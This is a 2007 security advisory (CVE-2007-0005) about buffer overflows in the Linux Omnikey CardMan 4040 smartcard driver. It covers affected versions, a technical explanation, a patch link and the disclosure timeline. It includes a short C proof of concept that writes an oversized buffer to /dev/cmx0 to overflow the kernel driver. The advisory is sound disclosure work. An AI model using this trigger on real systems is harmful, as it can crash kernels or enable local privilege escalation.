http://www.roe.ch/advisories/R200701-linux-cm4040-bof.txt ############################################################# # # COMPASS SECURITY ADVISORY http://www.csnc.ch/ # ############################################################# # # Product: Linux Driver for Omnikey CardMan 4040 # Vendor: Omnikey GmbH / Harald Welte # Subject: Buffer Overflow # Risk: Medium # Effect: Locally exploitable # Author: Daniel Roethlisberger (daniel.roethlisberger at csnc.ch) # Date: 2007-03-07 # CVE Name: CVE-2007-0005 # ############################################################# Introduction: ------------- The Linux drivers for the Omnikey CardMan 4040 smartcard reader contain a buffer overflow vulnerability. Local attackers with direct or indirect write permissions to a cmx device file can execute arbitrary code with kernel privileges or may cause denial of service. Vulnerable: ----------- * Linux 2.4/2.6 cm4040 drivers by Omnikey: - cm4040 v1.1.0 - cm4040 v1.2.0 - cm4040 v2.0.0 * Linux 2.6 cm4040 drivers by Harald Welte, as included in: - Linux 2.6.15 ... 2.6.20.1 Not vulnerable: --------------- * Linux 2.4/2.6 cm4040 drivers by Omnikey: - cm4040 v1.0.0 * FreeBSD cmx driver by Daniel Roethlisberger Not tested: ----------- * Other Linux driver versions * Drivers for MacOS X, Windows Technical Description: ---------------------- While using the Linux drivers for the CM4040 as a reference for writing a cmx FreeBSD driver, Compass Security has discovered two buffer overflows in the Linux drivers. One of them in the write() and another one in the read() handler. When calling write() with a buffer larger than 512 bytes, the driver's write buffer overflows, allowing to overwrite the EIP and execute arbitrary code with kernel privileges. In the read() handler, there is a similar problem with data originating in the device. A malicious or buggy device sending more than 512 bytes can overflow the driver's read buffer to the same effect. Of course, the write() vulnerability is only exploitable by users with direct or indirect write access to the cmx device special file. By default, direct access is limited to root. Therefore, one might think this is not an issue. However, unprivileged users may cause large indirect writes via userland daemons such as those provided by pcsc-lite or openct. Since "normal" APDUs are smaller than 512 bytes, this may not be an issue, but I haven't looked into the various ways to cause data to be written indirectly. Furthermore, a system can be set up to allow access to the device for a special user or group in order to increase security by running the userland drivers without root privileges. In such a setup users with access to the device can escalate privileges or cause DoS. PoC Code: --------- /* * Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005) * Copyright (C) Daniel Roethlisberger * Compass Security Network Computing AG, Rapperswil, Switzerland. * All rights reserved. * http://www.csnc.ch/ */ #include #include #include #include #include #include #include int main(int argc, char *argv[]) { int fd, i, n; char buf[8192]; /* * 0 1 2 3 4 5 6 7 8 9 a b c d e f ... * 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 ... */ for (i = 0; i < sizeof(buf); i += 2) { buf[i] = (char)(((i/2) & 0xFF00) >> 8); buf[i+1] = (char) ((i/2) & 0x00FF); } if ((fd = open("/dev/cmx0", O_RDWR)) < 0) { printf("Error: open() => %s\n", strerror(errno)); exit(errno); } if ((n = write(fd, buf, sizeof(buf))) < 0) { printf("Error: write() => %s\n", strerror(errno)); exit(errno); } printf("%d of %d bytes written\n", n, sizeof(buf)); exit(0); } Workaround: ----------- Patch available: http://lkml.org/lkml/2007/3/6/386 Timeline: --------- Vendor Status: Linux 2.6.21-rc3 contains the patch. Omnikey will fix it in their next driver release. Vendor Notified: 2007-02-05 (Harald Welte) 2007-02-06 (vendor-sec, Omnikey) Vendor Response: Will fix (Harald Welte, vendor-sec) Will fix but not coordinate release schedule (Omnikey) Embargo Until: 2007-03-06 -- Daniel Roethlisberger, Compass Security Network Computing AG Glaernischstrasse 7, CH-8640 Rapperswil, Switzerland Tel +41 55 214 41 77 Fax +41 55 214 41 61 daniel.roethlisberger at csnc.ch http://www.csnc.ch/ PGP: D927 96F6 7266 1683 06CF F984 ACEC DBB0 6929 2CBA Security Review - Penetration Testing - Computer Forensics